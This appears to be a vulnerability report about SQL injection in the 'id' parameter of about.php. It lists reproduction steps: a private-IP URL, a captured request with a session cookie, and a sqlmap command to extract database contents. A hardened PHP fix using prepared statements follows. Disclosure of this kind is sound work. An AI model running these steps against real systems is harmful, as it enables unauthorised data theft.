Hey, I think there is a SQL Injection vulnerability in this system.
The file about.php does not perform input validation on the 'id' parameter. So an attacker can append SQL queries to the input to extract sensitive information from the database.
1. Navigate to the about page:
Example: http://172.16.180.135:8022/about.php?id=2
2. Save the request to file.
Example:
GET /about.php?id=2 HTTP/1.1
Host: 172.16.180.135:8022
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=9796kkls37f6d7l72qc806mge9
Upgrade-Insecure-Requests: 1
3. Run SQLmap on the file
Example: sqlmap -r request.txt --dbms=mysql --threads=10
4. Get sensitive information from the database
about.php:
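
One way to close the hole described in the report, shown as an added example that is not the project's own code: accept `id` only as a positive integer and bind it in a prepared statement instead of concatenating it into the query. The table `about`, its columns `title` and `content`, and the connection settings are assumptions, since the page does not show the original query.

```php
<?php
declare(strict_types=1);

// Added example (not the project's code): hardened lookup for about.php?id=N.
// Requires PHP 8+ with mysqlnd. Table, column and credential names are assumed.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/** Return the id as an int, or null unless it is a plain positive integer. */
function parse_id(mixed $raw): ?int
{
    if (!is_string($raw)) {
        return null; // rejects array input such as ?id[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Fetch one row; the id travels as a bound integer, never as SQL text. */
function fetch_about(mysqli $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT title, content FROM about WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

$id = parse_id($_GET['id'] ?? null);
if ($id === null) {
    http_response_code(400); // input with appended SQL fails validation here
    exit('Invalid id');
}

// Placeholder credentials; use an account limited to SELECT on the needed tables.
$db = new mysqli('localhost', 'app_user', 'app_password', 'app_db');
$db->set_charset('utf8mb4');

$row = fetch_about($db, $id);
if ($row === null) {
    http_response_code(404);
    exit('Not found');
}

// Escape on output so stored content cannot inject markup.
echo '<h1>' . htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8') . '</h1>';
echo '<div>' . htmlspecialchars($row['content'], ENT_QUOTES, 'UTF-8') . '</div>';
```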